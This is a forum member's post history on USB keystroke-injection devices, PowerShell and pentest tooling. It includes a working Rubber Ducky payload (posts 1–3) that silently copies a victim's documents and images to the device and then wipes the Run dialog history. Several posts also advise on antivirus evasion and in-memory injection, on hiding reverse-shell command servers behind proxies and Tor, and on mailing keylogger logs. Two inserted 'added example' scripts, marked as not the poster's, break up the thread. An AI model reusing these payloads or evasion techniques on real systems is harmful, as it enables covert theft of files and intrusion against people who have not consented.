PoSHMagiC0de

Dedicated Members
  • Posts

    618
  • Joined

  • Last visited

  • Days Won

    26

Everything posted by PoSHMagiC0de

  1. One line you do have to change is to put in the name of the loot folder on the duck SSD. In the duckexfil file look for the $duckloot variable and it will have in quotes where to enter the name of the folder to exfil to. It also assumes you have the scripts in a "payloads" folder right off the root of the ducky. If that is not the case, that folder name will need to be changed in the duckexfil also, under the $payloaddir variable. I also mentioned I do not know what label Twin Duck gives itself when it mounts as storage, so you will need to get that and change the 2 labels that have "-" in them to be the label Twin Duck gives. One is in the one-line launcher and the other is in the duckexfil to get the duck drive. How it should work is the one-liner launcher should launch PowerShell and get the drive for the Twin Duck, combine it with the "payloads\DuckExfil.ps1" file and use Get-Content, encoding it all as string into memory and then outputting it as one solid string rather than a string array. (Posh 2.0 did not have the "-Raw" switch for Get-Content to get files as is, so it almost always returns arrays that cannot be invoked as scripts, so I pipe it to Out-String to make it a single string). It invokes that script, which loads the function into memory. You then run the function that will build the paths in memory it needs to access the RD Twin Duck drive and respective folders. You also build a list of file wildcards to get. With all that, the script pulls in and invokes the smbexfil script, which puts the function into memory, and then it runs the function with the parameters it needs. Now, if you wish to see it in action for testing, remove the "-W hidden" parameter from the launcher and the window will not vanish. Good for testing to see if the script is running or quits immediately. I would also (for testing) monitor the duck folder to see if files are going there. Oh, the loot folder has to exist.
A quick way to test is to just run the smbexfil script by itself on the victim with the RD plugged in with storage available, quacking nothing. You should see it and be able to hand-run the script with parameters to copy maybe just text files to it. I do not have an RD anymore so I am unable to test with TD. Replaced it with a BashBunny, so I do not know how the TD does things, but I do not see why this is not working.
  2. Man, been a busy week. Yeah, the script I recommended is to be used as almost a complete replacement for using CMD files. It takes inclusions as arrays and is completely PowerShell. What I meant by using it is on the Rubber Ducky you are limited to interactivity with your commands unlike the BB, so with that script you will need to create a launcher script to keep the quack command small, so it will be a two-stager only so you can use the 1st stage as your config script.

    # This is DuckExfil.ps1
    function Invoke-DuckExfil {
        $exfilfolder = "$env:userprofile\Documents\"
        # "-" is a placeholder: replace with the volume label Twin Duck uses when it mounts as storage.
        $duckDrive = (gwmi -class win32_volume -f "label='-'").Name
        $payloaddir = "payloads\"
        $duckpayloads = Join-Path $duckDrive $payloaddir
        $duckloot = Join-Path $duckDrive "loot folder on duck\"
        #Documents
        $docs = @("*.csv", "*.doc", "*.docx", "*.odt", "*.ods", "*.odg", "*.odp", "*.pdf", "*.pps", "*.txt", "*.tex", "*.ltx", "*.rtf", "*.xls", "*.xlsx")
        #Images
        $img = @("*.gif", "*.jpg", "*.jpeg", "*.png", "*.tiff", "*.psd", "*.webp")
        #And other formats that I will not include because it is monotonous.
        #Combine into 1 arraylist (New-Object form works on Posh 2.0 as well)
        $filetypes = New-Object System.Collections.ArrayList
        $filetypes.AddRange($docs)
        $filetypes.AddRange($img)
        #Get the smbexfil script and run it with parameters.
        IEX (gc (Join-Path $duckpayloads "Invoke-SMBExfil.ps1") -encoding String | Out-String)
        Invoke-SMBExfil $exfilfolder $duckloot $filetypes
        #Blink caps lock to signal that the copy is done.
        $wsh = New-Object -ComObject WScript.Shell
        $wsh.SendKeys('{CAPSLOCK}')
        sleep -m 250
        $wsh.SendKeys('{CAPSLOCK}')
        sleep -m 250
        $wsh.SendKeys('{CAPSLOCK}')
        sleep -m 250
        $wsh.SendKeys('{CAPSLOCK}')
        #Clear the Run dialog history.
        Remove-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    }

And the quack command should be something like this:

    STRING powershell -NoP -W hidden -C {$duck=(Join-Path (gwmi -class win32_volume -f "label='-'").Name "payloads\DuckExfil.ps1");IEX (gc $duck -encoding String | Out-String);Invoke-DuckExfil}

I do not know what the Twin Duck label is, so where the labels are at is what the label the RB Twin Duck shows up as. With the ducky commands to launch a cmd window done first and then the string command above, you should get the window disappearing and files copying, ending with that keyboard light sequence when done. Config of paths and stuff is done in the DuckExfil.ps1 file. Just showing another option.
  3. I do not have my Rubber Ducky anymore but have a BashBunny and a script in PowerShell for SMB exfiltration. It can be located in my BBTPS project at the link below. You just need to create a one-line stager to get the path to the Rubber Ducky and then Get-Content the script, invoke it and then run the function with the base path to the files, the path to where the files are going on the Rubber Ducky and an array of extensions or filenames you want from that folder. Of course all the extensions you want will make the command longer unless you build a wrapper script for it that will pass it all the extensions, or modify the script to invoke the command at the end of it with the parameters. https://github.com/PoSHMagiC0de/BBTPS/tree/master/jobs/totalp0wn Yeah, it is called smbexfil but it will take any kind of path you give it. I only called it that because I pass it a UNC path in the project to exfil via the SMB path to the BB.
  4. So, this is a never-ending adventure for me. Using dd in many different ways and the built-in USB image writer in the Ubuntu-like OSes, I have tried to make bootable USBs from bootable ISO images. I would have to say it is hit and miss. The three methods I have tried are: 1) DD the whole disk with the image (/dev/sdb) 2) Create a partition on the USB stick and dd into there (/dev/sdb1) 3) Using the USB stick reformatter and then USB image writer. Oh, I have also run sync at the end of each to make sure the USB is synced before safely ejecting it. One of the three above usually works, but I have run across some that do not work at all with the above methods. What I do know is if I jump on a Windows system and use Rufus portable it will always work. I mean it has never failed me. If the ISO is bootable, it will be bootable on the USB...always. Question: is there a 100% proven way to write a bootable ISO to a USB stick with Linux and have it be bootable? A good example of an ISO to try is Hiren's. That ISO would not boot up until I used Rufus to do it.
  5. The simple explanation for this situation is this. Although the computers in the library are for public use, they are owned by the library. When they break, the library has to requisition public funds to get them fixed. Either they have to call in a contractor or the city IT department has to fix it. So, it has private ownership even if it is a public service. I know somewhere around that machine there is a terms of service. So, it would be like if my neighbors gave me money (taxes in gov terms) and I used that money to put in a drinking fountain in my front yard that everyone can use (open to the public). If it has plumbing issues and stuff, I will have to pay to fix it since I bought it and am the owner...even if the neighbors help by giving more money. Ultimately it will be in my name (library machines are property of the library or city). So, does that mean I am not going to call the police if I see one of the neighborhood kids pissing in it? Does public use mean he can piss in it? Pretty much when you try and compromise the library machine or do anything outside the intended use of the service, you are essentially pissing in it, and if you are caught they will call the police on you. Now, I would be wary about doing illegal things on those machines too. They are property of the city, and by extension the gov. That means that traffic can be monitored by any number of agencies, and the library has cameras. Your agent calls out at a certain time, they have that timestamped and camera footage of you sitting at the machine. Now they only have to find you. Plus, the most you will probably get from the machine at great risk is folks browsing porn sites. :-P
  6. A simple way to describe a reverse shell is the victim machine calls out to the attacker machine and passes it a command prompt (shell). Look up netcat reverse shells. Now, as far as anonymous: most malicious C&Cs which the shell may be calling back to are on those bulletproof hosts. But if they are wanting to hide they would use a proxy, another server the shell calls to that will forward the traffic to the real server, or through a chain of servers till it arrives at the real server. This could be a dynamic proxy where the payload has the proxy to use and the server to end at, but of course then your real server IP will be in memory with the payload. The other is a static proxy where no matter what, if you talk to this server it will forward to the other server. Just keep in mind there is always a trail. The host company, if in a country where the hosts will work with law enforcement, will have records of the connections. Of course you could always have one of the proxies have Tor so when the traffic comes in, it goes out via Tor to your server running in Tor. How to do all of that, as I know that question may be coming next, you will have to research.
  7. I am going to put this right here as I feel the exact same way on how I should be asked a question. I always get them like this. Incomplete and more of me figuring out what the question is just to find out that someone wants me to do all the work for them on something rather than asking a question. Stop sending me messages to do all the work for you. I will not reply. Now, here are my guidelines... :-P
  8. Figured it out. I guess they did decide not to include the installer on the live preview part of the disk anymore. I had to install "debian-installer" and "debian-installer-launcher" to get the launcher to install from the Live preview boot. Doh.
  9. So, I am redoing my laptop again. I am doing it by hand with 2 different Linux distros. I am installing them on the same encrypted volume. I have done this dozens of times before but this is the first time I am doing it with Kali. Issue: the Kali live disk does not have an installer when booted in the live preview like other OSes do. It is supposed to, but I think Rapid 7 thought it was a good idea to pull it out in their latest version for some reason. Anyone know how to get it back on the live CD or another way to launch it? Before answers or questions roll in, check these out first. No, you cannot use the boot-up installer on a disk already encrypted and I do not want to wipe it because it has one of my OSes installed in it already. No, you cannot use the boot-up installer unless you know a way to load cryptsetup so I can open up my encrypted volume, which is why I need the installer in the live environment.
  10. True, but the support for the AC is sketchy. The one I posted is listed as tried and true. Liked it so much I decided to get one to use on the Pi 3 as a second antenna. Should be here next week hehe. I already have a 2.4GHz Alfa that works great for 2.4GHz stuff.
  11. And if you want dual band you can get one of these. https://www.amazon.com/dp/B01LY35HGO/ref=psdc_13983791_t3_B0035OCVO6
  12. Will be hard as it is trial and error. You can try using the web_delivery agent and its PowerShell stager to launch it. Try Veil with PowerShell and even Veil's cs meterpreter with ARYA. Might decrease detectability if you just grab the source it produces in C# and compile it on a Windows machine using csc.exe. You might want to look up obfuscation and try all the tricks they recommend. Also, try turning off Avira's firewall only and see if your session connects.
  13. I have not tried my luck against Avira yet. I usually go against Avast for detection. The question I have is: does Avira have a firewall? Try to ping the attacker machine from the victim with Avira on and see if it talks to it. Put up a simple web page on the attacker and see if you can browse to it with Avira on. If so, it may be still seeing the payload in transit and stopping it. Last question: are you running a staged payload or stageless? You know it is staged in Metasploit if it says something upon connection about sending stage 1, etc. Maybe the stage is getting intercepted. So many things could be the issue and you may have to do some things by hand to see what is happening. Like I try hand-grabbing payloads as plain text, compressed and even encrypted across the wire to see what gets through and see if it gets detected as I decrypt and/or uncompress and run. Since I do not use Avira, I cannot tell you where it might be dying. Maybe the Avira logs will tell you something? Probably even run Sysinternals Process Monitor to watch and see what fires off and stuff when the payload is launched. Compare to how it looks when it launches without AV versus how it looks when launched with it. Last thing, I always test in a VM, not only for protection of the machine but for rollbacks, mainly to clear the AV. Avast remembers bad payloads or payloads that were good but now deemed bad because they launched something that was considered bad. Once a payload is seen by Avast, locally it will remember, so even when I obfuscate it, it is still detected sometimes. Snapshot rollback to before the payload was detected fixes that.
  14. I would be the first to admit I ignore a ton of questions on here that resemble yours, mainly because most of them are from skiddies who have just bought a product hoping it is a "hack-in-the-box" (I trademark that name because a sec company here where I stay actually made something that can be classified as such hehe), meaning they can just plug it in and it does it all for them without them learning. So, forgive some members if they quickly jump down your throat. I may be guilty of this time and again too. With that said, I understand your frustration with the WiFi Nano. I too have issues with some payloads. I do not blame the product itself. It does work. I do say documentation on payload creation and even the authors' documentation tends to think everyone had first-hand knowledge of their module's construction, but that is just developer glass box syndrome. I even suffer from this at times; take a look at the documentation for my BBTPS for the Bashbunny hehehe. I admit I need to improve it. I updated recently and actually put work in on using modules in it rather than using it or its PineAP and using my laptop as the device to do all the MiTM stuff, and had issues with PortalAuth and EvilPortal. I recently saw a post where someone had to ssh into bunny to add the SD card to the path statement. So, undocumented bugs and issues are another small issue I see. Of course I have little understanding of OpenWRT so this makes working on payloads for the Pineapple and the PacketSquirrel a little more difficult too, so I blame my knowledge as well since everyone else is running these payloads. Though, I did get the Nano expecting my machine to do most of the work due to horsepower. So, yeah. For the Nano, you might want to ask on their forum if you have issues with payloads first before bagging. There are a lot of posts like that already and most of the people who do bag have been the skiddies.
So, though I am on the same page as you, the Nano does have uses and modules do work. It is probably due to, like me, us not being that deep into the tech of the product to resolve the issues, or some people on the Nano forums are keeping and not pinning common issues so they are seen before people post. I do put that back on the forum. Sorry, I have requested some pinned articles due to repeated questions and they have not been pinned, and the repeat of the questions keeps coming, so the forum does deserve some of the flak.
  15. Trying to figure out exactly what you are asking, seeing you say you have an exe you are trying to make FUD and you do not understand PowerSploit. If you have an exe you made yourself and are trying to obfuscate it or something, then the question is: do you have the source? Also, do you know its architecture too? Is it .NET and if so is it 32-bit or 64-bit; if it is unmanaged is it 32-bit or 64-bit? If you have the source then changing the code around to do the same thing could obfuscate it enough to not be seen, but do not use online scanners. Go download a free one on a test machine and test it there. Avast is a good one to test against, though it is very good so...yeah. If you have no source but know its architecture then you have a choice. If it is .NET then you can load it reflectively with PowerShell. PowerSploit's DLLInjection module shows this, though it is a little different with exes as you have to find the entry point and execute it (if it takes parameters, you have to feed it the parameters as it wants them, i.e. string[]...even if you have no parameters but the exe can take some, you need to give it those object types empty). If it is unmanaged, ReflectivePEInjection loading is what you will need, where you can keep the exe from hitting the drive and load directly from memory. The process (even if it is yourself) has to match the architecture of the executable though. If it is 32-bit, you will need to launch a 32-bit version of the PowerShell instance; if it is 64-bit then you will need to launch the 64-bit version of PowerShell to inject it right. The process you are injecting into must also have a matching bit version. Persistence will be tougher if your exe is detectable. You will need to encrypt it to leave behind somewhere on the system. The actual loader will be the one that is fired off, and it will grab the encrypted file, decrypt it in memory and inject. Be warned, unmanaged code injection is seen sometimes by Avast.
  16. I have written a script that does this before. Remove-WmiObject does not work on it. I cannot tell you why. But this will.

    Get-WmiObject -Computer $computer -Class Win32_UserProfile | where {($_.LocalPath -eq $profile)} | foreach {$_.Delete()}
  17. Add a "_" after the "$".

    Get-WmiObject -Class Win32_UserProfile | where {($_.LocalPath -eq 'C:\Users\JoeBloggs')}
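An added example (not PoSHMagiC0de's code) that wraps the Win32_UserProfile deletion from the two posts above in a function with the checks an administrator usually wants before calling Delete() on a profile: it refuses loaded (logged-on) and special system profiles, and it supports -WhatIf and -Confirm. The function name and the example path are assumptions.

```powershell
# Added example: safer wrapper around the Win32_UserProfile .Delete() approach.
function Remove-LocalUserProfile {
    [CmdletBinding(SupportsShouldProcess = $true, ConfirmImpact = 'High')]
    param(
        # Exact profile path to remove, e.g. 'C:\Users\JoeBloggs'
        [Parameter(Mandatory = $true)]
        [string]$LocalPath,

        # Remote target; defaults to the local machine
        [string]$ComputerName = $env:COMPUTERNAME
    )

    # Same filter as in the post: match LocalPath exactly (PowerShell -eq is case-insensitive).
    $profiles = Get-WmiObject -ComputerName $ComputerName -Class Win32_UserProfile |
        Where-Object { $_.LocalPath -eq $LocalPath }

    if (-not $profiles) {
        Write-Warning "No profile with LocalPath '$LocalPath' found on $ComputerName"
        return
    }

    foreach ($p in $profiles) {
        # A loaded profile belongs to a user who is still logged on; deleting it fails
        # or leaves a half-removed profile behind.
        if ($p.Loaded) {
            Write-Warning "Profile $($p.LocalPath) is loaded; skipping"
            continue
        }
        # Special profiles are the built-in service/system accounts and Default.
        if ($p.Special) {
            Write-Warning "Profile $($p.LocalPath) is a special system profile; skipping"
            continue
        }

        # ShouldProcess gives -WhatIf/-Confirm for free; ConfirmImpact=High prompts by default.
        if ($PSCmdlet.ShouldProcess("$ComputerName : $($p.LocalPath)", 'Delete user profile')) {
            # Delete() is the WMI method on the instance, which the post reports works
            # where Remove-WmiObject does not.
            $p.Delete()
            Write-Verbose "Deleted profile $($p.LocalPath) (SID $($p.SID))"
        }
    }
}

# Usage: preview first, then run for real (path is an example value).
# Remove-LocalUserProfile -LocalPath 'C:\Users\JoeBloggs' -WhatIf
# Remove-LocalUserProfile -LocalPath 'C:\Users\JoeBloggs' -Verbose
```

Run it with -WhatIf the first time; the ShouldProcess line prints what would be deleted without touching anything, which is the check you want before pointing this at a remote machine with -ComputerName.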
  18. You are trying to deauth while channel hopping. No workie. Your command for airodump-ng is not locking onto a particular AP nor is it locking onto a channel. If you want to deauth without airodump-ng running you will need to manually change your channel.

    sudo iwconfig mon0 channel <channel of ap>

After that it should find it. If you are using airodump-ng then put in the BSSID of the AP so it can lock onto it, or even add the "-c" option and the channel number to lock it to the channel the AP is on, and then it will find it. aireplay-ng does not have the ability to change its channel. It uses whatever channel the interface is currently on.
  19. Sold the Ducky and use a BB, but not that much difference, and I follow on the forums wherever I see PowerShell. So, looking at this script, it is going to send the same attachment over again every 30 seconds, just that it may get bigger each time? You may want to rename the log file, if the keylogger is not locking it, then send it and then remove that copy so it is different each time. Or if you do not want to send the file itself, still rename it but Get-Content the contents of the file as the body of the email and send. Just some ideas. :-)
  20. I didn't know about the LEDE thing. Good to see I was not the only one wondering about the version of OpenWRT on the devices, and good to see the Hak5 team is already on it. Was just wondering because on the OpenWRT site things look outdated and it gives signs of no more development, which sparked the concern.
  21. Just wondering. I never looked at any of the WRT distros until I found my old Linksys and said to myself, "Hmm, let's see if we can flash it with one of the open source firmwares." The first thing I thought about was OpenWRT so I checked it out. Did you know their main site has not been updated for a year? I also looked for instructions for my particular router and saw disturbing posts. WiFi not working with the firmware, this and that issues listed. Next to them all was the author saying not going to fix. In fact, "not going to fix" was on almost everything. This threw up flags making me think this distro is going the way of the Dodo. So, during my search for answers I found DD-WRT. Took a look at it and they have an image for my router that was put up as recently as December 2017. I also read all good things about it. I have not flashed it yet but am going to when I have time to work on that. So, the question I have is: is there a reason some Hak5 products still utilize OpenWRT versus DD-WRT, which seems to have development still happening in it this very day?
  22. I just saw your project. Some other advice with executables is you should not include programs from other programs...like netcat.exe is part of nmap, licensed to them. If you want your thing to be binary-less, look at Powercat. Nishang also has a script or two in there for netcat-compatible reverse shells.
  23. What he is doing with -AsPlainText is, when you convert a password to a secure string when the pass is in plain text, you have to let it know that and force the conversion, so to speak. I notice you are using the modules to check for open ssh or sftp. If you are looking at static ports you can do this in direct .NET, but you will need to clear and instantiate the socket class each time due to it being a disposable object. Would be better to make it a function and loop the function.

    function Invoke-Portscan {
        [CmdletBinding()]
        Param(
            [Parameter(Mandatory=$true)]
            [string]$IP,
            [Parameter(Mandatory=$true)]
            [int]$Port
        )
        $scanresult = $false
        $socket = New-Object System.Net.Sockets.TcpClient
        try {
            # Wait() returns $true if the connect finished inside the 1 second timeout.
            # A refused connection makes Wait() throw, so the catch keeps the result $false.
            if ($socket.ConnectAsync($IP, $Port).Wait(1000)) { $scanresult = $true }
        }
        catch { $scanresult = $false }
        $socket.Close() | Out-Null
        rv socket
        return $scanresult
    }

The above code will scan a single port and return true or false depending on whether it is open or not. It has a timeout of 1 sec. You could use it to scan a target port and react off of it. Posh-SSH is cool, but to use it you have to know what responses you expect back to react off of them...including the prompt, unless you are using regex to ignore the prompt part somehow.
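The "make it a function and loop the function" advice above, as an added example that is not the poster's code: a connect check over a list of ports that creates a fresh TcpClient per port, treats a refused connection (which makes Wait() throw) as closed rather than as an error, and returns objects you can filter on instead of reacting to prompt text. The function name, the host name and the port list are assumptions.

```powershell
# Added example: loop a TCP connect check over several ports and return objects.
function Test-TcpPorts {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory = $true)][string]$ComputerName,
        [Parameter(Mandatory = $true)][int[]]$Port,
        [int]$TimeoutMs = 1000
    )

    foreach ($p in $Port) {
        # New client per port: TcpClient is disposable and cannot be reused after a
        # failed or closed connection, which is why the loop lives outside the object.
        $client = New-Object System.Net.Sockets.TcpClient
        $open = $false
        try {
            # Wait() is $true only when the connect completed within the timeout;
            # a refused connection throws AggregateException, handled below.
            $open = $client.ConnectAsync($ComputerName, $p).Wait($TimeoutMs) -and $client.Connected
        }
        catch {
            # Refused / unreachable counts as closed, not as a script error.
            $open = $false
        }
        finally {
            # Also cancels a connect that is still pending after a timeout.
            $client.Dispose()
        }

        [pscustomobject]@{
            ComputerName = $ComputerName
            Port         = $p
            Open         = $open
        }
    }
}

# Usage (host name is a placeholder): decide from the result, not from prompt text.
$results = Test-TcpPorts -ComputerName 'host.example.test' -Port 22, 2222
$results | Format-Table -AutoSize
if ($results | Where-Object { $_.Port -eq 22 -and $_.Open }) {
    Write-Host 'Port 22 is open; an SSH session can be attempted'
}
```

The timeout only bounds how long the check waits; a filtered port that silently drops the SYN will use the whole TimeoutMs per port, so keep the list short or lower the timeout when checking many ports.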
  24. Oh, you want to replicate the pineapple on pi? Check out Fruity-Wifi. It was built with the pi in mind.
  25. Kali is an operating system. If you have never used Linux, you should not be looking at that distro of operating systems. Learn Linux first. Kali runs as root, which means everything runs as admin. If you go surfing in that OS or download things willy-nilly, you can be easily owned. Kali was built for advanced Linux users. Seeing you are trying to download it for Windows 10 (which you cannot, unless you run it as a virtual machine), you probably have never used Linux, so I would say start with Ubuntu, Fedora or CentOS and figure out how to get around and do things in those before trying to use a pentest OS.